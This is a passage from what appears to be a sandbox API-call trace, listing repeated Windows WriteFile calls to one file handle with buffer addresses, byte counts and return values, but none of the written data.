	[0201.907] WriteFile (in: hFile=0x534, lpBuffer=0x26cf396*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf396*, lpNumberOfBytesWritten=0x129420*=0x42, lpOverlapped=0x0) returned 1
	[0201.907] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.907] WriteFile (in: hFile=0x534, lpBuffer=0x26cf3da*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf3da*, lpNumberOfBytesWritten=0x129420*=0x4d, lpOverlapped=0x0) returned 1
	[0201.907] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.907] WriteFile (in: hFile=0x534, lpBuffer=0x26cf429*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf429*, lpNumberOfBytesWritten=0x129420*=0x24, lpOverlapped=0x0) returned 1
	[0201.907] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.908] WriteFile (in: hFile=0x534, lpBuffer=0x26cf44f*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf44f*, lpNumberOfBytesWritten=0x129420*=0x3f, lpOverlapped=0x0) returned 1
	[0201.908] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.908] WriteFile (in: hFile=0x534, lpBuffer=0x26cf490*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf490*, lpNumberOfBytesWritten=0x129420*=0x4c, lpOverlapped=0x0) returned 1
	[0201.908] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.908] WriteFile (in: hFile=0x534, lpBuffer=0x26cf4de*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf4de*, lpNumberOfBytesWritten=0x129420*=0x3a, lpOverlapped=0x0) returned 1
	[0201.908] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.908] WriteFile (in: hFile=0x534, lpBuffer=0x26cf51a*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf51a*, lpNumberOfBytesWritten=0x129420*=0x53, lpOverlapped=0x0) returned 1
	[0201.908] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.908] WriteFile (in: hFile=0x534, lpBuffer=0x26cf56f*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf56f*, lpNumberOfBytesWritten=0x129420*=0x29, lpOverlapped=0x0) returned 1
	[0201.908] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.908] WriteFile (in: hFile=0x534, lpBuffer=0x26cf59a*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf59a*, lpNumberOfBytesWritten=0x129420*=0x1d, lpOverlapped=0x0) returned 1
	[0201.908] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.908] WriteFile (in: hFile=0x534, lpBuffer=0x26cf5b9*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf5b9*, lpNumberOfBytesWritten=0x129420*=0x24, lpOverlapped=0x0) returned 1
	[0201.908] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.908] WriteFile (in: hFile=0x534, lpBuffer=0x26cf5df*, nNumberOfBytesToWrite=0x4e, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf5df*, lpNumberOfBytesWritten=0x129420*=0x4e, lpOverlapped=0x0) returned 1
	[0201.908] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.909] WriteFile (in: hFile=0x534, lpBuffer=0x26cf62f*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf62f*, lpNumberOfBytesWritten=0x129420*=0xf, lpOverlapped=0x0) returned 1
	[0201.909] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.909] WriteFile (in: hFile=0x534, lpBuffer=0x26cf640*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf640*, lpNumberOfBytesWritten=0x129420*=0x3d, lpOverlapped=0x0) returned 1
	[0201.909] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.909] WriteFile (in: hFile=0x534, lpBuffer=0x26cf67f*, nNumberOfBytesToWrite=0x13, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf67f*, lpNumberOfBytesWritten=0x129420*=0x13, lpOverlapped=0x0) returned 1
	[0201.909] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.909] WriteFile (in: hFile=0x534, lpBuffer=0x26cf694*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf694*, lpNumberOfBytesWritten=0x129420*=0x53, lpOverlapped=0x0) returned 1
	[0201.909] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.909] WriteFile (in: hFile=0x534, lpBuffer=0x26cf6e9*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf6e9*, lpNumberOfBytesWritten=0x129420*=0x1a, lpOverlapped=0x0) returned 1
	[0201.909] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.909] WriteFile (in: hFile=0x534, lpBuffer=0x26cf705*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf705*, lpNumberOfBytesWritten=0x129420*=0x51, lpOverlapped=0x0) returned 1
	[0201.909] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.909] WriteFile (in: hFile=0x534, lpBuffer=0x26cf758*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf758*, lpNumberOfBytesWritten=0x129420*=0x41, lpOverlapped=0x0) returned 1
	[0201.909] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.909] WriteFile (in: hFile=0x534, lpBuffer=0x26cf79b*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf79b*, lpNumberOfBytesWritten=0x129420*=0x16, lpOverlapped=0x0) returned 1
	[0201.910] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.910] WriteFile (in: hFile=0x534, lpBuffer=0x26cf7b3*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf7b3*, lpNumberOfBytesWritten=0x129420*=0x3f, lpOverlapped=0x0) returned 1
	[0201.910] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.910] WriteFile (in: hFile=0x534, lpBuffer=0x26cf7f4*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf7f4*, lpNumberOfBytesWritten=0x129420*=0xd, lpOverlapped=0x0) returned 1
	[0201.910] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.910] WriteFile (in: hFile=0x534, lpBuffer=0x26cf803*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf803*, lpNumberOfBytesWritten=0x129420*=0x47, lpOverlapped=0x0) returned 1
	[0201.910] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.910] WriteFile (in: hFile=0x534, lpBuffer=0x26cf84c*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf84c*, lpNumberOfBytesWritten=0x129420*=0x17, lpOverlapped=0x0) returned 1
	[0201.910] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.910] WriteFile (in: hFile=0x534, lpBuffer=0x26cf865*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf865*, lpNumberOfBytesWritten=0x129420*=0x46, lpOverlapped=0x0) returned 1
	[0201.910] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.910] WriteFile (in: hFile=0x534, lpBuffer=0x26cf8ad*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf8ad*, lpNumberOfBytesWritten=0x129420*=0x4d, lpOverlapped=0x0) returned 1
	[0201.910] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.910] WriteFile (in: hFile=0x534, lpBuffer=0x26cf8fc*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf8fc*, lpNumberOfBytesWritten=0x129420*=0x2f, lpOverlapped=0x0) returned 1
	[0201.910] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.911] WriteFile (in: hFile=0x534, lpBuffer=0x26cf92d*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf92d*, lpNumberOfBytesWritten=0x129420*=0x40, lpOverlapped=0x0) returned 1
	[0201.911] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.911] WriteFile (in: hFile=0x534, lpBuffer=0x26cf96f*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf96f*, lpNumberOfBytesWritten=0x129420*=0x16, lpOverlapped=0x0) returned 1
	[0201.911] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.911] WriteFile (in: hFile=0x534, lpBuffer=0x26cf987*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf987*, lpNumberOfBytesWritten=0x129420*=0xf, lpOverlapped=0x0) returned 1
	[0201.911] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.911] WriteFile (in: hFile=0x534, lpBuffer=0x26cf998*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf998*, lpNumberOfBytesWritten=0x129420*=0x26, lpOverlapped=0x0) returned 1
	[0201.911] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.911] WriteFile (in: hFile=0x534, lpBuffer=0x26cf9c0*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf9c0*, lpNumberOfBytesWritten=0x129420*=0x1b, lpOverlapped=0x0) returned 1
	[0201.911] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.911] WriteFile (in: hFile=0x534, lpBuffer=0x26cf9dd*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf9dd*, lpNumberOfBytesWritten=0x129420*=0x25, lpOverlapped=0x0) returned 1
	[0201.911] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.911] WriteFile (in: hFile=0x534, lpBuffer=0x26cfa04*, nNumberOfBytesToWrite=0x57, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfa04*, lpNumberOfBytesWritten=0x129420*=0x57, lpOverlapped=0x0) returned 1
	[0201.911] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.911] WriteFile (in: hFile=0x534, lpBuffer=0x26cfa5d*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfa5d*, lpNumberOfBytesWritten=0x129420*=0x15, lpOverlapped=0x0) returned 1
	[0201.912] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.912] WriteFile (in: hFile=0x534, lpBuffer=0x26cfa74*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfa74*, lpNumberOfBytesWritten=0x129420*=0x1a, lpOverlapped=0x0) returned 1
	[0201.912] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.912] WriteFile (in: hFile=0x534, lpBuffer=0x26cfa90*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfa90*, lpNumberOfBytesWritten=0x129420*=0x4b, lpOverlapped=0x0) returned 1
	[0201.912] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.912] WriteFile (in: hFile=0x534, lpBuffer=0x26cfadd*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfadd*, lpNumberOfBytesWritten=0x129420*=0x2f, lpOverlapped=0x0) returned 1
	[0201.912] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.912] WriteFile (in: hFile=0x534, lpBuffer=0x26cfb0e*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfb0e*, lpNumberOfBytesWritten=0x129420*=0x3a, lpOverlapped=0x0) returned 1
	[0201.912] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.912] WriteFile (in: hFile=0x534, lpBuffer=0x26cfb4a*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfb4a*, lpNumberOfBytesWritten=0x129420*=0x26, lpOverlapped=0x0) returned 1
	[0201.912] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.912] WriteFile (in: hFile=0x534, lpBuffer=0x26cfb72*, nNumberOfBytesToWrite=0x13, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfb72*, lpNumberOfBytesWritten=0x129420*=0x13, lpOverlapped=0x0) returned 1
	[0201.912] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.912] WriteFile (in: hFile=0x534, lpBuffer=0x26cfb87*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfb87*, lpNumberOfBytesWritten=0x129420*=0x2b, lpOverlapped=0x0) returned 1
	[0201.912] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.913] WriteFile (in: hFile=0x534, lpBuffer=0x26cfbb4*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfbb4*, lpNumberOfBytesWritten=0x129420*=0x15, lpOverlapped=0x0) returned 1
	[0201.913] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.913] WriteFile (in: hFile=0x534, lpBuffer=0x26cfbcb*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfbcb*, lpNumberOfBytesWritten=0x129420*=0x12, lpOverlapped=0x0) returned 1
	[0201.913] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.913] WriteFile (in: hFile=0x534, lpBuffer=0x26cfbdf*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfbdf*, lpNumberOfBytesWritten=0x129420*=0x18, lpOverlapped=0x0) returned 1
	[0201.913] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.913] WriteFile (in: hFile=0x534, lpBuffer=0x26cfbf9*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfbf9*, lpNumberOfBytesWritten=0x129420*=0x11, lpOverlapped=0x0) returned 1
	[0201.913] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.913] WriteFile (in: hFile=0x534, lpBuffer=0x26cfc0c*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfc0c*, lpNumberOfBytesWritten=0x129420*=0x30, lpOverlapped=0x0) returned 1
	[0201.958] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.958] WriteFile (in: hFile=0x534, lpBuffer=0x26cfc3e*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfc3e*, lpNumberOfBytesWritten=0x129420*=0x1d, lpOverlapped=0x0) returned 1
	[0201.958] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.958] WriteFile (in: hFile=0x534, lpBuffer=0x26cfc5d*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfc5d*, lpNumberOfBytesWritten=0x129420*=0xe, lpOverlapped=0x0) returned 1
	[0201.958] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.958] WriteFile (in: hFile=0x534, lpBuffer=0x26cfc6d*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfc6d*, lpNumberOfBytesWritten=0x129420*=0x34, lpOverlapped=0x0) returned 1
	[0201.959] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.959] WriteFile (in: hFile=0x534, lpBuffer=0x26cfca3*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfca3*, lpNumberOfBytesWritten=0x129420*=0x12, lpOverlapped=0x0) returned 1
	[0201.959] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.959] WriteFile (in: hFile=0x534, lpBuffer=0x26cfcb7*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfcb7*, lpNumberOfBytesWritten=0x129420*=0x3f, lpOverlapped=0x0) returned 1
	[0201.959] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.959] WriteFile (in: hFile=0x534, lpBuffer=0x26cfcf8*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cfcf8*, lpNumberOfBytesWritten=0x129420*=0x18, lpOverlapped=0x0) returned 1
